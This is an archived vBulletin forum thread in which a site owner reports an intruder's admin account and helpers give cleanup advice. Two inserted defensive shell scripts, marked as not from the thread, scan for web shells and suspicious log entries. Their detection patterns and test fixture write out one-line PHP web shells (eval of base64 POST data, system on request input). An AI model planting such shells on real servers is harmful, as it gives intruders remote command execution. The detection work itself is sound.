vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=252)
-   -   I've been hacked? (https://vborg.vbsupport.ru/showthread.php?t=315512)

Buzzle 11-20-2014 11:06 AM

I've been hacked?
 
Hi, I logged on today to see a random account I've never seen before with administrator. This is what he did:

http://puu.sh/cYklR/820873f86e.png

Can someone tell me how he got access or what he was doing once he was in.

Thank you.

Edit: /install directory has been deleted already.

Edit: Version 4.1.5 (Latest version)

Dave 11-20-2014 11:07 AM

Please post all of your active add-ons here.
We also need to know which vBulletin version you're using.

ozzy47 11-20-2014 11:08 AM

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site
Also please see these recent security announcements:
vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

What version of vB4 are you running?

Buzzle 11-20-2014 11:09 AM

Quote:

Originally Posted by Dave (Post 2523484)
Please post all of your active add-ons here.
We also need to know which vBulletin version you're using.

I'm using version 4.1.5 (Latest version)

By add-ons are you referring to products? If so

http://puu.sh/cYmWF/5856b728c1.png

ozzy47 11-20-2014 11:13 AM

Well first off, that version is outdated, and has unpatched security issues, you should be running the latest 4.2.2 at a minimum, or 4.2.3

Inferno shout is outdated, and most likely did not come from this site, I would ditch that and get a different shout, such as its newer version, https://vborg.vbsupport.ru/showthread.php?t=236970

Dave 11-20-2014 11:14 AM

Alright, that looks fine.
Now:

- Be sure the /install folder is not present on your vBulletin installation.
- Check all of your active plugins, there shouldn't be any fishy plugins with odd names.
- In your ACP go to Maintenance > Diagnostics > Suspect File Versions. Check if there are any weird files which were created recently on your server.
- Change the password of all administrator/moderator accounts.
- Protect your ACP with a plugin like this: https://vborg.vbsupport.ru/showthread.php?t=296383

Edit: vBulletin version is very outdated, update to the latest.

Buzzle 11-20-2014 11:15 AM

Quote:

Originally Posted by ozzy47 (Post 2523487)
Well first off, that version is outdated, and has unpatched security issues, you should be running the latest 4.2.2 at a minimum, or 4.2.3

Inferno shout is outdated, and most likely did not come from this site, I would ditch that and get a different shout, such as its newer version, https://vborg.vbsupport.ru/showthread.php?t=236970

Do you have any idea how the hacker got access to begin with?

ozzy47 11-20-2014 11:15 AM

Also check your plugins, ACP --> Plugins & Products --> Plugin Manager and see if there are any unknown plugins running under vBulletin

ozzy47 11-20-2014 11:16 AM

Quote:

Originally Posted by Buzzle (Post 2523490)
Do you have any idea how the hacker got access to begin with?

Well it could have been any of the security issues in the version you are running, or through Inferno shout.

ozzy47 11-20-2014 11:17 AM

Quote:

Originally Posted by Dave (Post 2523489)
Alright, that looks fine.
Now:

- Be sure the /install folder is not present on your vBulletin installation.
- Check all of your active plugins, there shouldn't be any fishy plugins with odd names.
- In your ACP go to Maintenance > Diagnostics > Suspect File Versions. Check if there are any weird files which were created recently on your server.
- Change the password of all administrator/moderator accounts.
- Protect your ACP with a plugin like this: https://vborg.vbsupport.ru/showthread.php?t=296383

Edit: vBulletin version is very outdated, update to the latest.

Only one I would ditch Dave is Inferno shout.

Buzzle 11-20-2014 11:17 AM

Quote:

Originally Posted by Dave (Post 2523489)
Alright, that looks fine.
Now:

- Be sure the /install folder is not present on your vBulletin installation.
- Check all of your active plugins, there shouldn't be any fishy plugins with odd names.
- In your ACP go to Maintenance > Diagnostics > Suspect File Versions. Check if there are any weird files which were created recently on your server.
- Change the password of all administrator/moderator accounts.
- Protect your ACP with a plugin like this: https://vborg.vbsupport.ru/showthread.php?t=296383

Edit: vBulletin version is very outdated, update to the latest.

I've run the scan and the only thing that it couldn't recognize were the plugins I added. I want to back my forums up but couldn't it just happen again?

Also, I've searched the plugin manager. Everything seems to be normal.

ozzy47 11-20-2014 11:18 AM

As I said in post #2, you need to follow the links.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site
Also please see these recent security announcements:
vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

Make sure you do not skip over any steps.

Buzzle 11-20-2014 11:21 AM

Quote:

Originally Posted by ozzy47 (Post 2523495)
As I said in post #2, you need to follow the links.

Please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site
Also please see these recent security announcements:
vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

Make sure you do not skip over any steps.

So if I ditch inferno, back it up from a safer time, add ACP protection there would be no way he could access it again?

Dave 11-20-2014 11:23 AM

Without having access to your ACP and access logs, we don't know how the person accessed your ACP.

ozzy47 11-20-2014 11:23 AM

There might, that is why you need to follow all the instructions in the blog posts, as well as ditch inferno.

ozzy47 11-20-2014 11:24 AM

Quote:

Originally Posted by Dave (Post 2523497)
Without having access to your ACP and access logs, we don't know how the person accessed your ACP.

And if they are smart, they deleted this info. :)

Buzzle 11-20-2014 11:24 AM

Quote:

Originally Posted by Dave (Post 2523497)
Without having access to your ACP and access logs, we don't know how the person accessed your ACP.

Is there a chance you can come on my TeamViewer and have a look?

TheLastSuperman 11-20-2014 11:25 AM

Ahh one of the multiple admin, do import hackers - look for one or more shell scripts uploaded to your server. Sometimes in clientscript/ or /includes and be sure to check any sub-folders.

Are you running any nulled modifications? Inferno Shoutbox Revolutionized what's that? :p

I'd submit a ticket and ask your hosting company to scan w/ whatever they have set up on their server be it Maldet (also referred to as Linux Malware Detect (LMD)) or similar but be forewarned some of these shell scripts are custom per site (depends on if you were worth their time) so Maldet and others do not always pick those up and the ONLY way to be sure is to go through all your folders by hand.

*Some stuff will stick out like a sore thumb, same way they want to be pompous and instead of using legit names like Admin for the 5-6 spare accounts it's always something cocky such as lolwut, lmao, amongst other names I've since long forgotten :cool: the point being most of it is easily spotted (file names such as shell.php / sexy.php / lol.php and similar) but every so often they hide one or more files very well w/ names that seem valid so be sure to use the Maintenance tools in admincp and do suspect files and other tips in the links Ozzy posted above.
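Dave's checklist (no /install, no unknown plugins, Suspect File Versions) and the advice just above both come down to walking the file tree looking for what does not belong. The script below is an added example, not from this thread and not vBulletin's own code: a POSIX shell triage that flags PHP files in directories that should hold only static assets, PHP files containing web-shell constructs, and PHP files whose inode changed recently. The directory list in ASSET_DIRS, the SHELL_PATTERN heuristic and the sample tree built by make_fixture are assumptions made for the example; the sample files are constructed stand-ins, not real vBulletin sources.

```shell
#!/bin/sh
# Added triage script (not from the thread, not vBulletin code). It builds a
# small constructed stand-in for a vBulletin web root, then lists PHP files
# that sit where only static assets belong, PHP files carrying web-shell
# constructs, and PHP files whose inode changed recently.

# Constructs legitimate forum code never needs: evaluating decoded or
# request-supplied data, or passing request data straight to a shell.
# preg_replace with the /e modifier is included because old shells used it;
# that sub-pattern is a coarse heuristic and will flag some innocent calls.
SHELL_PATTERN='(^|[^A-Za-z0-9_])((eval|assert)[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13|\$_(POST|GET|REQUEST|COOKIE))|(system|passthru|shell_exec|exec|popen|proc_open)[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST|COOKIE)|preg_replace[[:space:]]*\(.*/e)'

# Directories (assumed from a stock vBulletin 4 layout) that serve uploads
# or static assets and should contain no PHP at all.
ASSET_DIRS="images customavatars customprofilepics attachments clientscript"

# scan_webroot ROOT: print one "tag path" line per finding, sorted.
scan_webroot() {
    root=$1
    {
        for d in $ASSET_DIRS; do
            [ -d "$root/$d" ] && find "$root/$d" -type f -name '*.php'
        done | sed 's/^/misplaced-php /'
        find "$root" -type f -name '*.php' -exec grep -lE "$SHELL_PATTERN" {} + 2>/dev/null \
            | sed 's/^/shell-like /'
    } | sort -u
}

# recent_php ROOT DAYS: PHP files whose inode changed within DAYS days.
# ctime is used rather than mtime: `touch -r` lets an intruder back-date
# mtime to blend in with the install, but ctime cannot be set from userland.
recent_php() {
    find "$1" -type f -name '*.php' -ctime "-$2"
}

# make_fixture: constructed sample tree (stand-in content, not real vBulletin
# files) with one clean file and two planted shells. Prints the root path.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/images/misc" "$root/includes" "$root/clientscript"
    printf '<?php\n$q = htmlspecialchars($_GET["q"]);\necho $q;\n' \
        > "$root/includes/functions_demo.php"
    # innocuous-looking name in a code directory, obfuscated body
    printf '<?php\n@eval(base64_decode($_POST["c"]));\n' \
        > "$root/includes/class_core_bak.php"
    # PHP dropped where only images belong
    printf '<?php\nsystem($_REQUEST["cmd"]);\n' \
        > "$root/images/misc/thumb.php"
    echo "$root"
}

# Stand-alone run against the fixture; on a real host call
# scan_webroot /path/to/forum and recent_php /path/to/forum 30 instead.
if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    scan_webroot "$root"
    echo "--- changed in the last day ---"
    recent_php "$root" 1
    rm -rf "$root"
fi
```

Run it as `sh triage.sh --demo` to see the three findings on the fixture (thumb.php appears twice: once for its location, once for its body). Against a real forum, pass the web root to scan_webroot and treat every "misplaced-php" line as a finding regardless of content; the pattern match is only a first pass, so files it does not flag still need the by-hand review the post above describes, and recent_php with a window of 30 to 90 days is the quickest way to shortlist them.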

ozzy47 11-20-2014 11:26 AM

TBH it doesn't matter now how they got in, you need to plug the holes. First off by following all the instructions in the blog posts, then upgrade to at least 4.2.2

Buzzle 11-20-2014 11:30 AM

Alright, I'm going to back it up to yesterday and remove inferno shoutbox. Anything else?

TheLastSuperman 11-20-2014 11:31 AM

Ok I remembered even more after I ran off to another thread so back to share! See my post here as this is a very similar situation and check for those plugins I listed or similar ones.

http://www.vbulletin.com/forum/forum...31#post4012531

Dave 11-20-2014 11:31 AM

I have 1 hour of spare time, you may PM me your TeamViewer information and I'll take a look for you.

ozzy47 11-20-2014 11:41 AM

Quote:

Originally Posted by Buzzle (Post 2523503)
Alright, I'm going to back it up to yesterday and remove inferno shoutbox. Anything else?

You need to follow the instructions in the blog post I linked you to. It doesn't matter if it was not like this yesterday, they could have loaded the scripts months ago. Now they finally decided to act on them.

Follow the instructions, and upgrade to 4.2.2

If you decide to take the easy way out, you will just be hit again, as the site is now on their radar.

RichieBoy67 11-20-2014 03:04 PM

It depends if that was indeed the hole and what he did while inside. An easy way to see exactly what he did is to look at your server logs.

ozzy47 11-20-2014 03:23 PM

The shout is most likely an old version that was re-released by a hacking team, and I won't mention their name. :)

Also the vB version being run has unpatched security issues, as does any version below 4.2.2

Another thing it could be the install directory was still in the root.

Either way, the OP needs to follow the directions in the blog posts, then upgrade to 4.2.2

RichieBoy67 11-20-2014 03:46 PM

I know that hacking team only too well. :(

Yep, I agree to stick with the plan though I didn't read it. lol Was just saying to check server logs. it is one of the first things to do upon being hacked. :)
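RichieBoy67's point about checking the server logs is the one piece of the thread that can actually answer "how did he get in": hits on /install/, POSTs into admincp/, and requests for PHP files that are not part of the forum. The script below is an added example, not from this thread and not vBulletin's own code: an awk pass over an Apache/nginx "combined"-format access log that tags those three kinds of request and counts them per client IP. The list of known front-end script names is assumed from a stock vBulletin 4 install, and the log lines written by make_log_fixture are constructed (documentation-range addresses, not a real capture).

```shell
#!/bin/sh
# Added example (not from the thread): pull the requests that matter out of
# a web server access log in Apache/nginx "combined" format. Field layout
# assumed: client IP, two dashes, [timestamp], "METHOD PATH PROTO", status,
# bytes, referer, user agent. Script names below are assumed from a stock
# vBulletin 4 install and should be extended to match the forum in question.

# triage_log LOGFILE: print one tagged line per request of interest,
# followed by a per-IP count of those requests.
triage_log() {
    awk '
    BEGIN {
        n = split("index showthread forumdisplay newreply newthread login register member search private usercp profile misc attachment image ajax editpost", k, " ")
        for (i = 1; i <= n; i++) known["/" k[i] ".php"] = 1
    }
    {
        ip = $1
        method = $6; sub(/^"/, "", method)
        url = $7; split(url, parts, "?"); path = parts[1]
        tag = ""
        # /install/ must not exist on a live forum; any hit is a finding
        if (path ~ /^\/install\//)
            tag = "install-hit"
        # state-changing admin actions: who did what, from where
        else if (path ~ /^\/(admincp|modcp)\// && method == "POST")
            tag = "admincp-post"
        # PHP that is neither a known front-end script nor under the admin
        # or mod panels: most likely a planted shell being driven
        else if (path ~ /\.php$/ && !(path in known) && path !~ /^\/(admincp|modcp)\//)
            tag = "unknown-php"
        if (tag != "") {
            print tag " " ip " " url
            suspects[ip]++
        }
    }
    END {
        for (ip in suspects) print "suspect-ip " ip " " suspects[ip]
    }' "$1"
}

# make_log_fixture: constructed sample log (addresses from documentation
# ranges, not a real capture). Prints the temp file path.
make_log_fixture() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.7 - - [19/Nov/2014:22:41:03 +0000] "GET /showthread.php?t=12 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [19/Nov/2014:22:43:51 +0000] "GET /install/install.php HTTP/1.1" 200 2210 "-" "curl/7.38.0"
198.51.100.23 - - [19/Nov/2014:22:44:12 +0000] "POST /install/install.php?step=1 HTTP/1.1" 200 1800 "-" "curl/7.38.0"
198.51.100.23 - - [19/Nov/2014:22:46:05 +0000] "POST /admincp/user.php?do=update HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [19/Nov/2014:22:47:30 +0000] "POST /images/misc/thumb.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2014:22:48:00 +0000] "GET /forumdisplay.php?f=3 HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2014:22:49:10 +0000] "GET /admincp/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Stand-alone run against the fixture; on a real host run
# triage_log /var/log/apache2/access.log (or wherever the host keeps it).
if [ "${1:-}" = "--demo" ]; then
    log=$(make_log_fixture)
    triage_log "$log"
    rm -f "$log"
fi
```

On the fixture the output ties the /install/ hits, the admin-panel POST and the request for the dropped thumb.php to one address, which is the chain the thread is asking about. Only POSTs into admincp/ are tagged, so the legitimate admin's GET from 203.0.113.7 stays quiet; add the admin's real addresses to a whitelist and tag every admincp/ hit from anywhere else if the forum has few administrators. Logs rotate and, as ozzy47 notes, a careful intruder deletes them, so copy the current and rotated files off the host before cleaning anything.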


All times are GMT. The time now is 05:05 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
